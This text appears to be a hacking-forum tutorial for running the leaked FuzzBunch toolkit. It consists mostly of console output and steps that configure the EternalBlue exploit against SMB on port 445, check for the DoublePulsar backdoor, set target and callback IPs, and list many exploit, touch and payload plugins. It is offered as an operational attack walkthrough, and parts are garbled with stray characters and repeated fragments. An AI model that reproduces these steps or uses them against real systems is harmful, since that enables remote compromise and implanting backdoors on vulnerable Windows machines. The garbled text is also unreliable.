VerifyBackdoor : Ma圎xploitAttempts :: Number of times to attempt the exploit and groom. This option must be enabled for multiple exploit attempts. VerifyTarget : VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. NetworkTimeout : TargetIp :: Target IP Address TargetIp : TargetPort :: Port used by the SMB service for exploit connection TargetPort : VerifyTarget :: Validate the SMB string from target against the target selected before exploitation. NetworkTimeout :: Timeout for blocking network calls (in seconds). Entering Plugin Context :: Eternalblue Applying Global Variables Set NetworkTimeout => 60 Set TargetIp => Applying Session Parameters Running Exploit Touches Enter Prompt Mode :: Eternalblue Module: Eternalblue = Name Value - NetworkTimeout 60 TargetIp TargetPort 445 VerifyTarget True VerifyBackdoor True Ma圎xploitAttempts 3 GroomAllocations 12 Target WIN72K8R2 plugin variables are valid Prompt For Variable Settings? : hit enter Project : 0 New Project Name : Nulled.to Set target log directory to 'C:\Users\coolg\Desktop\NSA\windows\Logs\nulled.to\z192.168.100.23'? : Initializing Global State Set TargetIp => Set CallbackIp => Redirection OFF Set LogDir => C:\Users\coolg\Desktop\NSA\windows\Logs\nulled.to\z192.168.100.23 Set Project => nulled.to Type : useįb > use Plugin Category: ImplantConfig Name Version - Darkpulsar 1.1.0 Mofconfig 1.0.0 Plugin Category: ListeningPost Name Version - Plugin Category: Exploit = Name Version - Easybee 1.0.1 Easypi 3.1.0 Eclipsedwing 1.5.2 Educatedscholar 1.0.0 Emeraldthread 3.0.0 Emphasismine 3.4.0 Englishmansdentist 1.2.0 Erraticgopher 1.0.1 Eskimoroll 1.1.1 Esteemaudit 2.1.0 Eternalromance 1.4.0 Eternalsynergy 1.0.1 Ewokfrenzy 2.0.0 Explodingcan 2.0.2 Zippybeer 1.0.2 Plugin Category: Touch = Name Version - Architouch 1.0.0 Domaintouch 1.1.1 Eclipsedwingtouch 1.0.4 Educatedscholartouch 1.0.0 Emeraldthreadtouch 1.0.0 Erraticgophertouch 1.0.1 Esteemaudittouch 2.1.0 Explodingcantouch 1.2.1 Iistouch 1.2.2 Namedpipetouch 2.0.0 Printjobdelete 1.0.0 Printjoblist 1.0.0 Rpctouch 2.1.0 Smbtouch 1.1.1 Webadmintouch 1.0.1 Worldclienttouch 1.0.1 Plugin Category: Payload = Name Version - Doublepulsar 1.3.1 Jobadd 1.1.1 Jobdelete 1.1.1 Joblist 1.1.1 Pcdlllauncher 2.3.1 Processlist 1.1.1 Regdelete 1.1.1 Regenum 1.1.1 Regread 1.1.1 Regwrite 1.1.1 Rpcproxy 1.0.1 Smbdelete 1.1.1 Smblist 1.1.1 Smbread 1.1.1 Smbwrite 1.1.1 Plugin Category: Special = Name Version - Eternalblue 2.2.0 Eternalchampion 2.0.0 If your having any errors go to the Dll folder in the Pack and register all the. Base Log directory : C:\Users\coolg\Desktop\NSA\windows\Logs Checking C:\Users\coolg\Desktop\NSA\windows\Logs for projects Index Project - 0 Create a New Project Project : 0 New Project Name : Nulled.to Set target log directory to 'C:\Users\coolg\Desktop\NSA\windows\Logs\nulled.to\z192.168.100.23'? : Hit Enter

Base Log directory : C:\Users\coolg\Desktop\NSA\windows\Logs Checking C:\Users\coolg\Desktop\NSA\windows\Logs for projects Index Project - 0 Create a New Project Project : Default Target IP Address : Default Callback IP Address : Use Redirection : no Now it should say :įind Your The packs file location and then go to logs